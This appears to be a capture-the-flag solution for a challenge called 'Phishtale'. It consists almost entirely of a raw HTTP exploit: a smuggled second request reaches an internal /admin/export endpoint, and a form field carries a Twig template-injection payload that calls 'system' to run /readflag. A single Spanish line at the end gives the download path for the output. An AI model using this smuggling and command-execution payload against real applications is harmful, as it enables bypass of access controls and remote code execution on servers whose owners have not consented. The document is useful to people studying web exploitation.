POST / HTTP/2
Host: 192.168.86.48:1337
Cookie: PHPSESSID=9c53sa71dsh35d6pmghao8710j
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

POST /admin/export HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=9c53sa71dsh35d6pmghao8710j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: https://192.168.86.48:1337
Referer: https://192.168.86.48:1337/admin/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

slack-url=https%3A%2F%2Fhooks.slack.com%2Fservices%2FT00000000%2FB00000000%2FXXXXXXXXXXXXXXXXXXXXXXXX&redirect-url=https%3A%2F%2Foffice.com%2F&campaign=Phishtale+0x01+%F0%9F%8E%A3&log-title=pwneado{{['/readflag','']|sort('system')}}&template-page=facebook


Y lo descargas en: https://192.168.86.48:1337/static/exports/phishtale.zip